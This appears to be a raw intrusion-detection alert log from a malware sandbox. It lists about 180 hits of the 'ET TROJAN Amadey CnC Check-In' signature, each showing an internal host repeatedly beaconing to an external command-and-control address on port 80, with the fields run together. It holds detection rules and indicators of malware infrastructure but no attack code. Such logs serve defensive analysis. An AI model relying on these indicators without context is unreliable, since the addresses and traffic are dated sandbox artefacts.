                                                                      192.168.2.762.204.41.449962802027700 02/07/23-23:08:12.926371TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450033802027700 02/07/23-23:08:32.657521TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450189802027700 02/07/23-23:09:15.358033TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449787802027700 02/07/23-23:07:25.659773TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450218802027700 02/07/23-23:09:22.479535TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450402802027700 02/07/23-23:10:09.761332TCP2027700ET TROJAN Amadey CnC Check-In5040280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449995802027700 02/07/23-23:08:23.383016TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450111802027700 02/07/23-23:08:54.086078TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449700802027700 02/07/23-23:07:03.031561TCP2027700ET TROJAN Amadey CnC Check-In4970080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449759802027700 02/07/23-23:07:17.049971TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449889802027700 02/07/23-23:07:52.061130TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450005802027700 02/07/23-23:08:25.803187TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450087802027700 02/07/23-23:08:47.809633TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450378802027700 02/07/23-23:10:03.940156TCP2027700ET TROJAN Amadey CnC Check-In5037880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450026802027700 02/07/23-23:08:30.966267TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449988802027700 02/07/23-23:08:21.653564TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450255802027700 02/07/23-23:09:33.778377TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449823802027700 02/07/23-23:07:34.268183TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449979802027700 02/07/23-23:08:19.443584TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450451802027700 02/07/23-23:10:23.598729TCP2027700ET TROJAN Amadey CnC Check-In5045180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449832802027700 02/07/23-23:07:36.602000TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450246802027700 02/07/23-23:09:31.574488TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450442802027700 02/07/23-23:10:21.434131TCP2027700ET TROJAN Amadey CnC Check-In5044280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450054802027700 02/07/23-23:08:39.617227TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450184802027700 02/07/23-23:09:14.118143TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450397802027700 02/07/23-23:10:08.575838TCP2027700ET TROJAN Amadey CnC Check-In5039780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449893802027700 02/07/23-23:07:53.025577TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449922802027700 02/07/23-23:08:03.022275TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450369802027700 02/07/23-23:10:01.812383TCP2027700ET TROJAN Amadey CnC Check-In5036980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450470802027700 02/07/23-23:10:28.297773TCP2027700ET TROJAN Amadey CnC Check-In5047080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449851802027700 02/07/23-23:07:42.712679TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449804802027700 02/07/23-23:07:29.696240TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450227802027700 02/07/23-23:09:24.691350TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450423802027700 02/07/23-23:10:14.904732TCP2027700ET TROJAN Amadey CnC Check-In5042380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450061802027700 02/07/23-23:08:41.341687TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450274802027700 02/07/23-23:09:38.463286TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450070802027700 02/07/23-23:08:43.541726TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449794802027700 02/07/23-23:07:27.299792TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450073802027700 02/07/23-23:08:44.306614TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450156802027700 02/07/23-23:09:05.211996TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449950802027700 02/07/23-23:08:09.942679TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449766802027700 02/07/23-23:07:19.651200TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450128802027700 02/07/23-23:08:58.335870TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449775802027700 02/07/23-23:07:22.751531TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450468802027700 02/07/23-23:10:27.766831TCP2027700ET TROJAN Amadey CnC Check-In5046880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449849802027700 02/07/23-23:07:42.221380TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450042802027700 02/07/23-23:08:36.263611TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450394802027700 02/07/23-23:10:07.826263TCP2027700ET TROJAN Amadey CnC Check-In5039480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450312802027700 02/07/23-23:09:47.795938TCP2027700ET TROJAN Amadey CnC Check-In5031280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450385802027700 02/07/23-23:10:05.658909TCP2027700ET TROJAN Amadey CnC Check-In5038580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450303802027700 02/07/23-23:09:45.572466TCP2027700ET TROJAN Amadey CnC Check-In5030380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450045802027700 02/07/23-23:08:37.461652TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450017802027700 02/07/23-23:08:28.743485TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450366802027700 02/07/23-23:10:01.065650TCP2027700ET TROJAN Amadey CnC Check-In5036680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449747802027700 02/07/23-23:07:14.171173TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449877802027700 02/07/23-23:07:49.111852TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449712802027700 02/07/23-23:07:05.940453TCP2027700ET TROJAN Amadey CnC Check-In4971280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450283802027700 02/07/23-23:09:40.653335TCP2027700ET TROJAN Amadey CnC Check-In5028380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450414802027700 02/07/23-23:10:12.687095TCP2027700ET TROJAN Amadey CnC Check-In5041480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450201802027700 02/07/23-23:09:18.336544TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450331802027700 02/07/23-23:09:52.497858TCP2027700ET TROJAN Amadey CnC Check-In5033180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449896802027700 02/07/23-23:07:53.775433TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449915802027700 02/07/23-23:08:01.310915TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450163802027700 02/07/23-23:09:06.937703TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449714802027700 02/07/23-23:07:06.440544TCP2027700ET TROJAN Amadey CnC Check-In4971480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449910802027700 02/07/23-23:08:00.070255TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449809802027700 02/07/23-23:07:30.882146TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450196802027700 02/07/23-23:09:17.107942TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450109802027700 02/07/23-23:08:53.586754TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449773802027700 02/07/23-23:07:22.191273TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450137802027700 02/07/23-23:09:00.524989TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450333802027700 02/07/23-23:09:52.974040TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450305802027700 02/07/23-23:09:46.051156TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450392802027700 02/07/23-23:10:07.350927TCP2027700ET TROJAN Amadey CnC Check-In5039280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450210802027700 02/07/23-23:09:20.545993TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449868802027700 02/07/23-23:07:46.881014TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450428802027700 02/07/23-23:10:16.360693TCP2027700ET TROJAN Amadey CnC Check-In5042880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450191802027700 02/07/23-23:09:15.842999TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449837802027700 02/07/23-23:07:38.971375TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450168802027700 02/07/23-23:09:09.197666TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450165802027700 02/07/23-23:09:07.791157TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450456802027700 02/07/23-23:10:24.827371TCP2027700ET TROJAN Amadey CnC Check-In5045680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450300802027700 02/07/23-23:09:44.841607TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449898802027700 02/07/23-23:07:54.273097TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449981802027700 02/07/23-23:08:19.921142TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449941802027700 02/07/23-23:08:07.714681TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450030802027700 02/07/23-23:08:31.914466TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450382802027700 02/07/23-23:10:04.927710TCP2027700ET TROJAN Amadey CnC Check-In5038280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449763802027700 02/07/23-23:07:18.271872TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450315802027700 02/07/23-23:09:48.543330TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449778802027700 02/07/23-23:07:23.476930TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449971802027700 02/07/23-23:08:15.502675TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450107802027700 02/07/23-23:08:53.058285TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450459802027700 02/07/23-23:10:25.566570TCP2027700ET TROJAN Amadey CnC Check-In5045980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450371802027700 02/07/23-23:10:02.294848TCP2027700ET TROJAN Amadey CnC Check-In5037180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449752802027700 02/07/23-23:07:15.374110TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450241802027700 02/07/23-23:09:30.345222TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449865802027700 02/07/23-23:07:46.144261TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450193802027700 02/07/23-23:09:16.370708TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449735802027700 02/07/23-23:07:11.564677TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449913802027700 02/07/23-23:08:00.811571TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450063802027700 02/07/23-23:08:41.843313TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450213802027700 02/07/23-23:09:21.269831TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450343802027700 02/07/23-23:09:55.462030TCP2027700ET TROJAN Amadey CnC Check-In5034380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450354802027700 02/07/23-23:09:58.136933TCP2027700ET TROJAN Amadey CnC Check-In5035480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449724802027700 02/07/23-23:07:08.827019TCP2027700ET TROJAN Amadey CnC Check-In4972480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449943802027700 02/07/23-23:08:08.214342TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450135802027700 02/07/23-23:09:00.033380TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449964802027700 02/07/23-23:08:13.400472TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450298802027700 02/07/23-23:09:44.339809TCP2027700ET TROJAN Amadey CnC Check-In5029880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450326802027700 02/07/23-23:09:51.276591TCP2027700ET TROJAN Amadey CnC Check-In5032680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449707802027700 02/07/23-23:07:04.724651TCP2027700ET TROJAN Amadey CnC Check-In4970780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449768802027700 02/07/23-23:07:20.940206TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449875802027700 02/07/23-23:07:48.616862TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450142802027700 02/07/23-23:09:01.792842TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450231802027700 02/07/23-23:09:25.697760TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450387802027700 02/07/23-23:10:06.125158TCP2027700ET TROJAN Amadey CnC Check-In5038780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449697802027700 02/07/23-23:07:01.357866TCP2027700ET TROJAN Amadey CnC Check-In4969780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450308802027700 02/07/23-23:09:46.817930TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450160802027700 02/07/23-23:09:06.194716TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449992802027700 02/07/23-23:08:22.643209TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449918802027700 02/07/23-23:08:02.062414TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450059802027700 02/07/23-23:08:40.814145TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450237802027700 02/07/23-23:09:28.175009TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449841802027700 02/07/23-23:07:40.291176TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449974802027700 02/07/23-23:08:17.631579TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450310802027700 02/07/23-23:09:47.315519TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450203802027700 02/07/23-23:09:18.814519TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449796802027700 02/07/23-23:07:27.783130TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450114802027700 02/07/23-23:08:54.813586TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450091802027700 02/07/23-23:08:48.773540TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449946802027700 02/07/23-23:08:08.944668TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450132802027700 02/07/23-23:08:59.313660TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450002802027700 02/07/23-23:08:25.080418TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449780802027700 02/07/23-23:07:23.953446TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450209802027700 02/07/23-23:09:20.298654TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450104802027700 02/07/23-23:08:52.249237TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450012802027700 02/07/23-23:08:27.539545TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450364802027700 02/07/23-23:10:00.578597TCP2027700ET TROJAN Amadey CnC Check-In5036480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449742802027700 02/07/23-23:07:13.217594TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450361802027700 02/07/23-23:09:59.837623TCP2027700ET TROJAN Amadey CnC Check-In5036180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449745802027700 02/07/23-23:07:13.690917TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450094802027700 02/07/23-23:08:49.510006TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450097802027700 02/07/23-23:08:50.388048TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450186802027700 02/07/23-23:09:14.607278TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450438802027700 02/07/23-23:10:20.467632TCP2027700ET TROJAN Amadey CnC Check-In5043880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449770802027700 02/07/23-23:07:21.455442TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450466802027700 02/07/23-23:10:27.272312TCP2027700ET TROJAN Amadey CnC Check-In5046680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450158802027700 02/07/23-23:09:05.696446TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450336802027700 02/07/23-23:09:53.715951TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450288802027700 02/07/23-23:09:41.886673TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450206802027700 02/07/23-23:09:19.556589TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449936802027700 02/07/23-23:08:06.480598TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449847802027700 02/07/23-23:07:41.745093TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449717802027700 02/07/23-23:07:07.153402TCP2027700ET TROJAN Amadey CnC Check-In4971780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449799802027700 02/07/23-23:07:28.505366TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450170802027700 02/07/23-23:09:10.682104TCP2027700ET TROJAN Amadey CnC Check-In5017080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449819802027700 02/07/23-23:07:33.315465TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449908802027700 02/07/23-23:07:59.582545TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450040802027700 02/07/23-23:08:35.106092TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450069802027700 02/07/23-23:08:43.290160TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449920802027700 02/07/23-23:08:02.536242TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450473802027700 02/07/23-23:10:29.015986TCP2027700ET TROJAN Amadey CnC Check-In5047380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450412802027700 02/07/23-23:10:12.220070TCP2027700ET TROJAN Amadey CnC Check-In5041280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450118802027700 02/07/23-23:08:55.823225TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450216802027700 02/07/23-23:09:22.010258TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449731802027700 02/07/23-23:07:10.568753TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449985802027700 02/07/23-23:08:20.913010TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450154802027700 02/07/23-23:09:04.744163TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450249802027700 02/07/23-23:09:32.275895TCP2027700ET TROJAN Amadey CnC Check-In5024980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450056802027700 02/07/23-23:08:40.088529TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449728802027700 02/07/23-23:07:09.767109TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449826802027700 02/07/23-23:07:34.986762TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449882802027700 02/07/23-23:07:50.365010TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449916802027700 02/07/23-23:08:01.554969TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449821802027700 02/07/23-23:07:33.782681TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449879802027700 02/07/23-23:07:49.589028TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450417802027700 02/07/23-23:10:13.425468TCP2027700ET TROJAN Amadey CnC Check-In5041780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450285802027700 02/07/23-23:09:41.160719TCP2027700ET TROJAN Amadey CnC Check-In5028580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450048802027700 02/07/23-23:08:38.164092TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450375802027700 02/07/23-23:10:03.233760TCP2027700ET TROJAN Amadey CnC Check-In5037580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450121802027700 02/07/23-23:08:56.541604TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450322802027700 02/07/23-23:09:50.288220TCP2027700ET TROJAN Amadey CnC Check-In5032280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450280802027700 02/07/23-23:09:39.926138TCP2027700ET TROJAN Amadey CnC Check-In5028080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450339802027700 02/07/23-23:09:54.482136TCP2027700ET TROJAN Amadey CnC Check-In5033980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449797802027700 02/07/23-23:07:28.024524TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449952802027700 02/07/23-23:08:10.427883TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449932802027700 02/07/23-23:08:05.505650TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449748802027700 02/07/23-23:07:14.403704TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449929802027700 02/07/23-23:08:04.773416TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450260802027700 02/07/23-23:09:35.014959TCP2027700ET TROJAN Amadey CnC Check-In5026080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449846802027700 02/07/23-23:07:41.490813TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.762.204.41.4
